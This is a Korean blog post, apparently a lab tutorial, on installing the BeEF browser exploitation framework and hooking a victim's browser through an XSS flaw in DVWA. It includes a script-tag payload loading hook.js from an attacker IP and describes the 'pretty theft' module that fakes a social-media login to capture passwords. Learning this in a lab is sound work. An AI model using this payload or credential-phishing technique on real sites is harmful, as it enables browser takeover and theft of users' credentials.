Notice
Recent Posts
Recent Comments
Link
일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | 5 | 6 | 7 |
8 | 9 | 10 | 11 | 12 | 13 | 14 |
15 | 16 | 17 | 18 | 19 | 20 | 21 |
22 | 23 | 24 | 25 | 26 | 27 | 28 |
29 | 30 | 31 |
Tags
- PHP
- 경기팀
- 기타정보
- nurisec
- UKPT
- codeup
- webhacking
- 웹 해킹 입문
- Los
- 대외활동
- 파이썬
- 불법유통근절
- 화학물질불법유통온라인감시단
- 정보보안
- 도구모음
- 12기
- 국정원
- MITRE ATT&CK
- 여행
- 연구모임
- 화학물질안전원
- suninatas
- UKPT level
- 불법유통
- HTML
- 국가기록원
- Service
- 국가정보원
- 프로젝트
- 화학물질
Archives
- Today
- Total
agencies
beef-xss 본문
※ 설치 방법
sudo apt-get update
sudo apt install beef-xss
크로스사이트 스크립팅 취약점이 존재하면 공격자는 세션 탈취 이외에도 다양한 공격을 수행할 수 있습니다.
beff는 브라우저 익스플로잇 프레임워크 프로그램으로 자체적으로 제공하는 자바스크립트로 된 후킹 코드를 사용자가
실행하면, 그 사용자의 호스트를 대상으로 여러 가지 공격을 실행할 수 있도록 하는 프로그램입니다.
beef를 실행한 화면
security 쿠키값이 low 인 상태에서
<script src="공격자ip/hook.js"></script>
<script src='http://192.168.0.19:3000/hook.js'></script>
를 입력하고 submit을 누릅니다.
※ 공격자 ip(beef-xss)수정방법
경로 : /usr/share/beef-xss
sudo systemctl restart beef-xss
후크 스크립트를 실행한 호스트가 표시되었습니다.
이 호스트를 선택하면 호스트의 각종 정보가 출력됩니다.
커맨드에서 pretty theft를 선택
* pretty theft란 유명 sns 사이트의 인터페이스를 모방해서 사용자로 하여금 그 sns 사이트의 아이디와 패스워드를 입력하도록 유도하는 기능입니다.
execute 버튼을 클릭합니다.
그렇게 되면 후킹 코드를 실행한 피해자의 화면을 보면 위와 같이 팝업창이 나타나게 됩니다.
사용자가 email과 password를 입력해서 login버튼을 클릭하게 된다면
공격자의 화면에서는 피해자가 입력한 정보가 비프 프로그램에 표시가됩니다.
'Ⅲ. 정보보안' 카테고리의 다른 글
리눅스 /var/log/messages가 보이지 않을 때 (0) | 2024.04.24 |
---|---|
홈페이지 운영 서버 다운 (스펙터 v2) (0) | 2024.04.24 |
DVWA Command Injection (0) | 2024.04.19 |
브루트 포스 공격 실습(무차별 대입 공격) 패스워드 크랙 (0) | 2024.04.19 |
OWASP TOP 10 (2017) (0) | 2024.04.18 |